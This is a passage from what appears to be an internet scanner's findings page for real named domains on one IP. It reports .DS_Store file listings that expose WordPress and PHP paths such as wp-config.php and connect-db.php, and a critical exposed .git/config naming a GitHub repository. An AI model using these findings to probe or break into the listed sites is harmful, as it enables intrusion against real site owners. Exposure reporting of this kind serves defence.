Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 21:15
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:14
Last seen 2024-09-16 20:58
Open for 696 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 20:58
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.Additionally the GIT credentials are present and could give unauthorized access to source code repository of private projects.
First seen 2024-07-02 05:41
Last seen 2024-09-16 20:55
Open for 76 days-
Severity: critical
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a65227548d73b[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true symlinks = false [user] email = gitium@presslabs.com name = Gitium [push] default = matching [remote "origin"] url = https://user:pass@github.com/ericbrianpearson/sweetandloai fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2024-09-16 20:55376 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-20 18:18
Last seen 2024-09-16 20:48
Open for 697 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bc5e74dd734213f79136acb1d242cea00cFound 22 files trough .DS_Store spidering: /all_dropdown.css /DIN-HOME-Chartered-Contractors-LOGO.gif /dinhome_contact.css /dinhome_home.css /favicon-16x16.png /favicon-32x32.png /history_company /history_company/careers_&_development /history_company/images /history_company/images/inventory /history_company/posters /history_company/runway_models /history_company/runway_models/images /history_company/runway_models/images/inventory /history_company/runway_models/index.html /images /index.html /job /main.css /privacy_statement_of_dinhome_design_main.css /project_management.css /SpryAssets
Found on 2024-09-16 20:48 -
Severity: low
Fingerprint: 5f32cf5d6962f09cab28146bab28146b8f73f7167c256670f22a60a7bd5a7888Found 21 files trough .DS_Store spidering: /all_dropdown.css /DIN-HOME-Chartered-Contractors-LOGO.gif /dinhome_contact.css /dinhome_home.css /favicon-16x16.png /favicon-32x32.png /history_company /history_company/careers_&_development /history_company/images /history_company/posters /history_company/runway_models /history_company/runway_models/images /history_company/runway_models/images/inventory /history_company/runway_models/index.html /images /index.html /job /main.css /privacy_statement_of_dinhome_design_main.css /project_management.css /SpryAssets
Found on 2024-08-16 16:54 -
Severity: low
Fingerprint: 5f32cf5d6962f09cdafa5447dafa54479d3e5762e8d68a1cd6c408c395158a08Found 18 files trough .DS_Store spidering: /all_dropdown.css /DIN-HOME-Chartered-Contractors-LOGO.gif /dinhome_contact.css /dinhome_home.css /favicon-16x16.png /favicon-32x32.png /history_company /history_company/careers_&_development /history_company/images /history_company/posters /history_company/runway_models /images /index.html /job /main.css /privacy_statement_of_dinhome_design_main.css /project_management.css /SpryAssets
Found on 2024-06-18 10:18
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.winston.austynandbrian.com
Port: 443
URL: https://www.winston.austynandbrian.comFirst seen 2022-09-10 17:39
Last seen 2024-09-16 20:39
Open for 737 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 20:39
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-20 18:35
Last seen 2024-09-16 20:36
Open for 697 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3c1fc5e93c1fc5e9466051ac734856ccb5d31acf1720259eFound 5 files trough .DS_Store spidering: /asset /css /fonts /images /js
Found on 2024-09-16 20:36
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: winston.austynandbrian.com
Port: 443
URL: https://winston.austynandbrian.comFirst seen 2022-09-10 17:39
Last seen 2024-09-16 20:32
Open for 737 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 20:32
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.sage.austynandbrian.com
Port: 443
URL: https://www.sage.austynandbrian.comFirst seen 2022-09-12 17:40
Last seen 2024-09-16 20:25
Open for 735 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 20:25
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-20 18:31
Last seen 2024-09-16 20:16
Open for 697 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c4239b3d84239b3d83fa5bcae254fbb4f2bc97ef927c132d4Found 8 files trough .DS_Store spidering: /javascript /site.psd /site_index.jpg /site_projectlist.jpg /site_selectedproject.jpg /site_work.jpg /siteimages /type
Found on 2024-09-16 20:16
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-12 17:40
Last seen 2024-09-16 20:13
Open for 735 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 20:13
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.saffron.austynandbrian.com
Port: 443
URL: https://www.saffron.austynandbrian.comFirst seen 2022-09-12 17:40
Last seen 2024-09-16 20:13
Open for 735 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 20:13
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.Additionally the GIT credentials are present and could give unauthorized access to source code repository of private projects.
First seen 2024-07-02 05:30
Last seen 2024-09-16 20:09
Open for 76 days-
Severity: critical
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a65227548d73b[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true symlinks = false [user] email = gitium@presslabs.com name = Gitium [push] default = matching [remote "origin"] url = https://user:pass@github.com/ericbrianpearson/sweetandloai fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2024-09-16 20:09376 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-23 17:37
Last seen 2024-09-16 19:58
Open for 724 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 19:58
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: quezztioncash.quezztion.com
Port: 443
URL: https://quezztioncash.quezztion.comFirst seen 2022-09-06 17:39
Last seen 2024-09-16 19:32
Open for 741 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c92dfb71592dfb715c6a6126fce46e9735d42ef81e57d38e8Found 45 files trough .DS_Store spidering: /.DS_Store /about.php /app_pics /config.php /connect-db.php /connexion.php /Database /default /default/css /default/images /delete.php /delete_cat.php /delete_questions.php /edit.php /edit_cat.php /edit_infos.php /edit_questions.php /footer.php /header.php /ht.txt /index.php /jscolor /json.php /json_category /json_questions /mail_login.php /media /new.php /new_cat.php /new_questions.php /profile.php /scripts /sign_up.php /style /style/images /style/js /thumbnails /upload.php /users.php /view-paginated.php /view-paginated_cat.php /view-paginated_questions.php /view.php /view_cat.php /view_questions.php
Found on 2024-09-16 19:32 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cccd847a3ccd847a3564b8ed187db8f05fb1b0d3f93e5e73fFound 43 files trough .DS_Store spidering: /.DS_Store /about.php /app_pics /config.php /connect-db.php /connexion.php /Database /default /default/css /default/images /delete.php /delete_cat.php /delete_questions.php /edit.php /edit_cat.php /edit_infos.php /edit_questions.php /footer.php /header.php /ht.txt /index.php /jscolor /json.php /json_category /json_questions /mail_login.php /media /new.php /new_cat.php /new_questions.php /profile.php /scripts /sign_up.php /style /thumbnails /upload.php /users.php /view-paginated.php /view-paginated_cat.php /view-paginated_questions.php /view.php /view_cat.php /view_questions.php
Found on 2024-09-03 00:59
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-21 18:39
Last seen 2024-09-16 19:29
Open for 635 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 19:29
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:02
Last seen 2024-09-16 19:26
Open for 696 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 19:26
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.vanpeg.likesnotyikes.com
Port: 443
URL: https://www.vanpeg.likesnotyikes.comFirst seen 2023-02-20 18:47
Last seen 2024-09-16 19:19
Open for 574 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 19:19
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: jaynesimon.austynelizabeth.com
Port: 443
URL: https://jaynesimon.austynelizabeth.comFirst seen 2022-10-21 18:02
Last seen 2024-09-16 19:15
Open for 696 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 19:15
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.jaynesimon.austynelizabeth.com
Port: 443
URL: https://www.jaynesimon.austynelizabeth.comFirst seen 2022-10-21 18:02
Last seen 2024-09-16 19:14
Open for 696 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 19:14
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: mail.crescofamilydentistry.com
Port: 443
URL: https://mail.crescofamilydentistry.comFirst seen 2022-09-03 17:49
Last seen 2024-09-16 19:13
Open for 744 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c87f05b7087f05b70375faefa4ce46cd5179878e9afa5fbd6Found 26 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-09-16 19:13 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c7d264b917d264b9160849753017c087673603fa87cbe0457Found 52 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-content/uploads/2014 /wp-content/uploads/2014/10 /wp-content/uploads/2015 /wp-includes /wp-includes/certificates /wp-includes/css /wp-includes/fonts /wp-includes/ID3 /wp-includes/images /wp-includes/js /wp-includes/pomo /wp-includes/SimplePie /wp-includes/Text /wp-includes/theme-compat /wp-snapshots
Found on 2024-09-16 04:25 -
Severity: low
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec9fac0e6672cfcb39a5c2afdd8a3c8cc6Found 17 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-includes /wp-snapshots
Found on 2024-09-14 20:38 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cef4770e6ef4770e677d071b8249d3e0bef342ccf792ff97eFound 42 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-content/uploads/2014 /wp-content/uploads/2014/10 /wp-content/uploads/2015 /wp-includes /wp-snapshots
Found on 2024-09-04 20:21 -
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733f267656412fc17a2402c7a0ee4f232867Found 10 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-content /wp-includes /wp-snapshots
Found on 2024-08-30 14:51 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cb3107650b31076505d8d3f5a68139ff5a664350911313d28Found 39 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-08-28 21:52 -
Severity: low
Fingerprint: 5f32cf5d6962f09cab28146bab28146b0b68ebdd68da4928bc84bb7202e1ad59Found 21 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/themes /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-08-26 04:02 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c248e4f81248e4f81da6f9b432bf7e266d47cef5833c9267eFound 41 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-content/uploads/2014 /wp-content/uploads/2015 /wp-includes /wp-snapshots
Found on 2024-08-12 15:58
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: cfd.ohc.lwj.mybluehost.me
Port: 443
URL: https://cfd.ohc.lwj.mybluehost.meFirst seen 2022-09-03 17:48
Last seen 2024-09-16 19:10
Open for 744 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec9fac0e6672cfcb39a5c2afdd8a3c8cc6Found 17 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-includes /wp-snapshots
Found on 2024-09-16 19:10 -
Severity: low
Fingerprint: 5f32cf5d6962f09c87f05b7087f05b70375faefa4ce46cd5179878e9afa5fbd6Found 26 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-09-16 01:28 -
Severity: low
Fingerprint: 5f32cf5d6962f09cab28146bab28146b0b68ebdd68da4928bc84bb7202e1ad59Found 21 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/themes /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-09-14 18:21 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cb3107650b31076505d8d3f5a68139ff5a664350911313d28Found 39 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-09-13 01:20 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c7d264b917d264b9160849753017c087673603fa87cbe0457Found 52 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-content/uploads/2014 /wp-content/uploads/2014/10 /wp-content/uploads/2015 /wp-includes /wp-includes/certificates /wp-includes/css /wp-includes/fonts /wp-includes/ID3 /wp-includes/images /wp-includes/js /wp-includes/pomo 